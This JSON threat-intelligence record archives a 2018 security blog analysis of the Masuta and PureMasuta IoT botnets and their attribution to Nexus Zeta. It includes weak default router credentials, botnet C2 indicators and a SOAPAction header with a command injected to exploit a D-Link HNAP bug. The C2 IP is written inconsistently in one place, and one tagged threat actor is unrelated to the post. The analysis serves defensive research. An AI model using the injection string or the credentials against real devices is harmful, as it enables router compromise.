{
	"id": "4e19a0ea-0663-4d11-baf5-619fee1d353d",
	"created_at": "2026-04-06T00:11:23.964238Z",
	"updated_at": "2026-04-10T13:12:52.906022Z",
	"deleted_at": null,
	"sha1_hash": "a306959ff3a6250c7b27945139ca00be6515770c",
	"title": "Masuta : Satori Creators’ Second Botnet Weaponizes A New Router Exploit. - New Sky Security",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1289353,
	"plain_text": "Masuta : Satori Creators’ Second Botnet Weaponizes A New\r\nRouter Exploit. - New Sky Security\r\nPublished: 2018-01-23 · Archived: 2026-04-02 10:45:24 UTC\r\nIntroduction\r\nSince the inception of the Mirai code leak, many botnets have been seen in the IoT threat landscape. While some\r\nof them are clearly Mirai carbon copies, others have added new attack methods, often taking the route of exploits\r\nto perform an attack. We analyzed two variants of an IoT botnet named “Masuta” where we observed the\r\ninvolvement of a well-known IoT threat actor and discovered a router exploit being weaponized for the first time\r\nin a botnet campaign.\r\nMasuta Code Leak \u0026 Attribution\r\nWe were able to get hands on the source code of Masuta (Japanese for “master”) botnet in an invite only dark\r\nforum. After analyzing the configuration file., we saw that Masuta uses 0xdedeffba instead of Mirai’s 0xdeadbeef\r\nas the seed of the cipher key, hence the strings in the configuration files were effectively xored by ((DE^DE)^FF)\r\n^BA or 0x45.\r\nNow xoring the configuration file with 0x45, we get the domain nexusiotsolutions(dot)net which is a known C2\r\nURL of Nexus Zeta involved with recent Satori attacks, where a Huawei router zero day was used.\r\nhttps://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nPage 1 of 5\n\nThe WHOIS information for the URL also states contact as nexuszeta1337@gmail(.)com, indicating that Nexus\r\nZeta is not a one hit wonder creator of Satori, but also has been involved in the creation of the Masuta botnet.\r\nThe standard Masuta variant used several known/weak/default credentials to get access to the IoT device it\r\nattacked.\r\nThe Masuta attacks (defined by the recon indicator /bin/busybox MASUTA ) have been on the rise since\r\nSeptember as honeypots observed 2400 IPs involved in the botnet in last three months. The rising trend is shown\r\nin the graph below.\r\nOne of the prominent command and control servers involved in Masuta attacks is n(.)cf0(.)pw or 93.174.93.63.\r\nPureMasuta Variant \u0026 Exploit Usage\r\nThis IP address 93.17.93.63 gave us a way inside another evolved variant of the Masuta botnet. Although we did\r\nnot obtain the source code of this variant in Blackhat forums, on analyzing the compiled ARM binary it was clear\r\nthat this was not just a usual Masuta sample.\r\nThe Masuta variant (dubbed as PureMasuta) contains the most typical of Mirai style code, with a weak credential\r\nlist (PMMV = “root”, TKXZT = “vizxv”, CFOKL = “admin”).\r\nhttps://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nPage 2 of 5\n\nThe credentials are hidden by a single byte XOR by 0x22 as shown in the figure below, another inspiration from\r\nthe Mirai leak.\r\nHowever, what makes PureMasuta stand out of common Mirai/Masuta is the usage of EDB 38722 D-Link\r\nexploit.\r\nExplaining the EDB 38722 D-Link HNAP Bug\r\nThe weaponized bug introduced in PureMasuta botnet is in the HNAP (Home Network Administration Protocol)\r\nwhich itself is based on the SOAP protocol. It is possible to craft a SOAP query which can bypass authentication\r\nby using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands\r\n(leading to arbitrary code execution) because of improper string handling. When both issues are combined, one\r\ncan form a SOAP request which first bypasses authentication, and then causes arbitrary code execution. For\r\nexample, the string below will cause a reboot.\r\nSOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”\r\nHence in simple words, whatever code is written after GetDeviceSettings will be executed.\r\nInstead of the reboot, the PureMasuta botnet downloads a shell script from a command and control server (via\r\nwget) and runs it. Following image shows the script in action in the botnet binary.\r\nhttps://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nPage 3 of 5\n\nWe noticed that the command and control server (93.174.93.63) is same as used in the original Masuta variants,\r\nhence indicating that PureMasuta is an evolved creation of the same Masuta threat actors.\r\nThe proof of concept of the exploit is available for public in places like exploit-db and pastebin . Hence, we can\r\nassume it will not be very difficult for an attacker to implement the exploit.\r\nObsession with Brian Krebs\r\nMany IoT botnets mention Brian Krebs, a known journalist who was instrumental in the investigation behind\r\nMirai as an Easter egg. Masuta is no exception as we saw the following message in the source code:\r\nThis same message was tweeted out by an unverified twitter account of Nexus Zeta, connecting the dots with his\r\nassociation with the Masuta botnet.\r\nConclusion\r\nNexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already\r\nbeen observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215\r\nin his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets.\r\nThis makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.\r\nProtocol exploits are more desirable for threat actors as they usually have a wider scope. A protocol can be\r\nimplemented by various vendors/models and a bug in the protocol itself can get carried on to a wider range of\r\ndevices. NewSky Security IoT Halo detects all the four SOAP exploits mentioned in this blog.\r\nAnkit Anubhav, Principal Researcher, NewSky Security (NewSky Security)\r\nhttps://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nPage 4 of 5\n\nSource: https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nhttps://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7"
	],
	"report_names": [
		"masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c90b1108-7555-4e64-9bfe-1ef6bf2caf18",
			"created_at": "2023-01-06T13:46:38.739456Z",
			"updated_at": "2026-04-10T02:00:03.084254Z",
			"deleted_at": null,
			"main_name": "Nexus Zeta",
			"aliases": [],
			"source_name": "MISPGALAXY:Nexus Zeta",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434283,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a306959ff3a6250c7b27945139ca00be6515770c.pdf",
		"text": "https://archive.orkl.eu/a306959ff3a6250c7b27945139ca00be6515770c.txt",
		"img": "https://archive.orkl.eu/a306959ff3a6250c7b27945139ca00be6515770c.jpg"
	}
}